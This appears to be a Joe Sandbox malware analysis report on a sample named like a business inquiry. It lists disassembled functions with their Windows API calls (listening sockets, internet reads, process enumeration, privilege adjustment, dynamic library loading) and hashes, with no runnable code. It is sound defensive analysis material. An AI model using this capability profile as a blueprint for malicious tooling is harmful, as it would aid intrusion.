                                          • Opcode Fuzzy Hash: e3fd209ab8bd18b8eb5f69392ce862962ab25884f1ee10a5cdfc020c05f66642
                                          • Instruction Fuzzy Hash: 8D228FB15083019FC724DF24C891BAFB7E9EF84704F10991DF996A7291DB71EA44CBA2
                                          Function 00E66596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E665EF
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E665FE
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00E6661A
                                          • listen.WSOCK32(00000000,00000005), ref: 00E66629
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E66643
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00E66657
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                          • String ID:
                                          • API String ID: 1279440585-0
                                          • Opcode ID: 12e5bbf68ba7611f17893d4abf7d485b8baf8b5048632536e9b26c7d1aa346c4
                                          • Instruction ID: 5904e69d3e104d068a1cf29266bf1610c9504ea1ad4282bd604ceeeda704088b
                                          • Opcode Fuzzy Hash: 12e5bbf68ba7611f17893d4abf7d485b8baf8b5048632536e9b26c7d1aa346c4
                                          • Instruction Fuzzy Hash: 0521CE316402049FDB00EF24E845B7EB7F9EF44364F158159E91AB72D1CB70AD45CB61
                                          Function 00DF1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00DF19FA
                                          • GetSysColor.USER32(0000000F), ref: 00DF1A4E
                                          • SetBkColor.GDI32(?,00000000), ref: 00DF1A61
                                            • Part of subcall function 00DF1290: DefDlgProcW.USER32(?,00000020,?), ref: 00DF12D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ColorProc$LongWindow
                                          • String ID:
                                          • API String ID: 3744519093-0
                                          • Opcode ID: 97a963edf4b9afacfda70e9d71321e5096ad3169da504b9278c364d62d74e5c4
                                          • Instruction ID: 8e706624c694c33962c6c70c478a1067296a30c1702da894c7a876e28b62d731
                                          • Opcode Fuzzy Hash: 97a963edf4b9afacfda70e9d71321e5096ad3169da504b9278c364d62d74e5c4
                                          • Instruction Fuzzy Hash: 1BA1AC7810549DFED638AB29AC45DBF369CDB42345F2ED20AF752F6192CE14CC0292B1
                                          Function 00E66A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E680A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E680CB
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E66AB1
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E66ADA
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00E66B13
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E66B20
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00E66B34
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 99427753-0
                                          • Opcode ID: f2bc79b5057b31f9efcab2b62b3ce782478d9f30c939387f466f45a5eae28bbe
                                          • Instruction ID: 03cf56c60b74057246714d49d197fd454b8509b730363eb45fe9b02cdd063fd5
                                          • Opcode Fuzzy Hash: f2bc79b5057b31f9efcab2b62b3ce782478d9f30c939387f466f45a5eae28bbe
                                          • Instruction Fuzzy Hash: C441B575A40214AFEB10AF64DC96F7EB7A8DB44714F05C058FA1ABB2D2CA705D008BB1
                                          Function 00E755FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                          • String ID:
                                          • API String ID: 292994002-0
                                          • Opcode ID: caa03ee852be04ebdc8e1156cb0c47c47c29ea9be97d9b154000d0b21ce2faa5
                                          • Instruction ID: 9af1dd8038cbf42ed2cb1f908183013db7947d9c5547d6acd69abcefc402dccf
                                          • Opcode Fuzzy Hash: caa03ee852be04ebdc8e1156cb0c47c47c29ea9be97d9b154000d0b21ce2faa5
                                          • Instruction Fuzzy Hash: B01104327009106FE7216FA6DC44B2FB798EF44721B41D429F90EF7240CBB09D428AA5
                                          Function 00E6C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00E31D88,?), ref: 00E6C312
                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E6C324
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                          • API String ID: 2574300362-1816364905
                                          • Opcode ID: 783ae2fbddce2d79ab8bafbdcc2e15edcb4accf2abfc676ca987c759431a569c
                                          • Instruction ID: 16f65f5264f062304f89255696f0ed3b5cfe9155296508ced25fb9f55b68a381
                                          • Opcode Fuzzy Hash: 783ae2fbddce2d79ab8bafbdcc2e15edcb4accf2abfc676ca987c759431a569c
                                          • Instruction Fuzzy Hash: 67E08C70280713CFCB208B26E804A5676D4EF08788F90E479E889F2210E774D880CA60
                                          Function 00E6F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00E6F151
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00E6F15F
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00E6F21F
                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E6F22E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                          • String ID:
                                          • API String ID: 2576544623-0
                                          • Opcode ID: 1cbcd7bab60f42d38d59ab01e7b5e4192fea062e6d94e8f21a10ed635fa9be17
                                          • Instruction ID: 7b299b13ee869a373df88d228bb536e7e3374d7c8e0921fe25e85f5c7d53f56d
                                          • Opcode Fuzzy Hash: 1cbcd7bab60f42d38d59ab01e7b5e4192fea062e6d94e8f21a10ed635fa9be17
                                          • Instruction Fuzzy Hash: D85181715043059FD310EF20EC95E6BB7E8FF94750F11482DF59597262DB70A908CBA2
                                          Function 00E540B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E540D1
                                          • _memset.LIBCMT ref: 00E540F2
                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E54144
                                          • CloseHandle.KERNEL32(00000000), ref: 00E5414D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                          • String ID:
                                          • API String ID: 1157408455-0
                                          • Opcode ID: a9c9a0a3921fd4bc0dc89bd237931892325ce0c363759b01ee844970d2fd28c2
                                          • Instruction ID: 0f1321ef3310ba147ade7964bfb0dbf40902233c2837a0fa9d147f5f1480c316
                                          • Opcode Fuzzy Hash: a9c9a0a3921fd4bc0dc89bd237931892325ce0c363759b01ee844970d2fd28c2
                                          • Instruction Fuzzy Hash: 9E11EB759012287AD7309BA59C4DFEBBBBCEF44764F1045A6F908E71C0D6744EC48BA4
                                          Function 00E4EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E4EB19
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID: ($|
                                          • API String ID: 1659193697-1631851259
                                          • Opcode ID: 33f3391f24332fe42f9ac0f48bd6520329e2d60f4265aaff253ca382252e6c11
                                          • Instruction ID: d040d9c25db49388c7805a223103f59db03c6156ea3c758e9c4729b03124ac28
                                          • Opcode Fuzzy Hash: 33f3391f24332fe42f9ac0f48bd6520329e2d60f4265aaff253ca382252e6c11
                                          • Instruction Fuzzy Hash: C0323675A006059FC728CF29D4819AAB7F1FF48310B15D56EE89AEB3A1D770E981CB40
                                          Function 00E625E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00E626D5
                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E6270C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Internet$AvailableDataFileQueryRead
                                          • String ID:
                                          • API String ID: 599397726-0
                                          • Opcode ID: b5bd6691e02e05e5d4b3907d06cce969c99df595f1732c43f9170a05f3e46256
                                          • Instruction ID: ef61accea257c592e34924d1bd259fcc95e689c0c26b535ca3b1f28d0991877e
                                          • Opcode Fuzzy Hash: b5bd6691e02e05e5d4b3907d06cce969c99df595f1732c43f9170a05f3e46256
                                          • Instruction Fuzzy Hash: FD41D371940A09BFEB20DA54EC85EFF77ECEB407A8F10606EF705B6140EA71AD819764
                                          Function 00E5B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E5B5AE
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E5B608
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E5B655
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID:
                                          • API String ID: 1682464887-0
                                          • Opcode ID: 1f205eb3c76977d62770d8a93fdc49382f98b4740f5241cd79fc48f4384f5f0f
                                          • Instruction ID: dbdc05dde5bff280ceb8c6b2c78273201a02b0a5ef9d7c48e1d10ebf3c8a84fb
                                          • Opcode Fuzzy Hash: 1f205eb3c76977d62770d8a93fdc49382f98b4740f5241cd79fc48f4384f5f0f
                                          • Instruction Fuzzy Hash: E2216035A00518EFCB00EF65D890AADFBB8FF49314F1580A9E905AB361DB31A959CF61
                                          Function 00E48CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E10FF6: std::exception::exception.LIBCMT ref: 00E1102C
                                            • Part of subcall function 00E10FF6: __CxxThrowException@8.LIBCMT ref: 00E11041
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E48D0D
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E48D3A
                                          • GetLastError.KERNEL32 ref: 00E48D47
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                          • String ID:
                                          • API String ID: 1922334811-0
                                          • Opcode ID: 68033cf353d65f2ede3effd2f8a7c693df27c057946e9816b5d25863ae502c19
                                          • Instruction ID: 376c34fe6fd2f5c2369a1592f1e92385613dc7650de45a26d66d2d0f8dd4a732
                                          • Opcode Fuzzy Hash: 68033cf353d65f2ede3effd2f8a7c693df27c057946e9816b5d25863ae502c19
                                          • Instruction Fuzzy Hash: 7B1194B1914205AFD728DF64ED85DABB7FCFF48710B10852EF455A7241DF70AC818A60
                                          Function 00E54C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E54C2C
                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E54C43
                                          • FreeSid.ADVAPI32(?), ref: 00E54C53
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: 178cd6c6344bc3762aa1a33cb3b9d8888d2cc15bbf6665727e913bbec2b9973a
                                          • Instruction ID: d2ad6b7eb1781bedaed60ab77a26bce9e51ea2c790013b18e6f6a0364ebb4ab2
                                          • Opcode Fuzzy Hash: 178cd6c6344bc3762aa1a33cb3b9d8888d2cc15bbf6665727e913bbec2b9973a
                                          • Instruction Fuzzy Hash: B2F04975A1130CBFDF04DFF0DC89EAEBBBCEF08201F0044A9E905E2281E6706A489B50
                                          Function 00E58B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • __time64.LIBCMT ref: 00E58B25
                                            • Part of subcall function 00E1543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E591F8,00000000,?,?,?,?,00E593A9,00000000,?), ref: 00E15443
                                            • Part of subcall function 00E1543A: __aulldiv.LIBCMT ref: 00E15463
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Time$FileSystem__aulldiv__time64
                                          • String ID: 0u
                                          • API String ID: 2893107130-1339160046
                                          • Opcode ID: 8617a9cb53f5def5a9a9377cc95c35c3066d8d479062bda977d12aed1d72aa6e
                                          • Instruction ID: 7c6abd81ba8a9a045b50f68b7d86e995a555dbce46d7ca4dc43765c61e10d618
                                          • Opcode Fuzzy Hash: 8617a9cb53f5def5a9a9377cc95c35c3066d8d479062bda977d12aed1d72aa6e
                                          • Instruction Fuzzy Hash: 5F2102726355108FC329CF29D841A52B3E1EBA4311B289F2CD4E6EB2D0CA30B909CB90
                                          Function 00DFE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2be66397ab60dce6384abc8c7054faee2b51f84faae82e46ea2e77b15228f594
                                          • Instruction ID: 51b51364b263a59db57ce00518c3ecd28048486bce8e3a479538da798cf3ff35
                                          • Opcode Fuzzy Hash: 2be66397ab60dce6384abc8c7054faee2b51f84faae82e46ea2e77b15228f594
                                          • Instruction Fuzzy Hash: 6E226D709002199FDB24DF54C484ABEBBF1FF08300F19C569EA55AB361E774E985CBA1
                                          Function 00E5C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E5C966
                                          • FindClose.KERNEL32(00000000), ref: 00E5C996
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 06738db38625d6546bd029f34f075662487a15958f95bd55c82e2b59a2b9e3b1
                                          • Instruction ID: 3fc22a86359c90d54ec2b48308cf016da6716c873ef57fbaa8cb230b14eb9967
                                          • Opcode Fuzzy Hash: 06738db38625d6546bd029f34f075662487a15958f95bd55c82e2b59a2b9e3b1
                                          • Instruction Fuzzy Hash: B3118E326006049FD710EF29D855A2AF7E9EF84324F01891EF9A9D72A1DB30AC04CB91
                                          Function 00E5A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E6977D,?,00E7FB84,?), ref: 00E5A302
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E6977D,?,00E7FB84,?), ref: 00E5A314
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: ea497f50ef6533aef8bc29bec492db710fcdd894eaf407230c82ef29b093be52
                                          • Instruction ID: 24ddb908b2b900c44b38e62b266bc9220266d6af3829d08119dd45490a4062f3
                                          • Opcode Fuzzy Hash: ea497f50ef6533aef8bc29bec492db710fcdd894eaf407230c82ef29b093be52
                                          • Instruction Fuzzy Hash: FBF0823554422DBBDB109FA4DC48FFA776DFF08761F008265F908E6191D6309A48CBA1
                                          Function 00E48713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E48851), ref: 00E48728
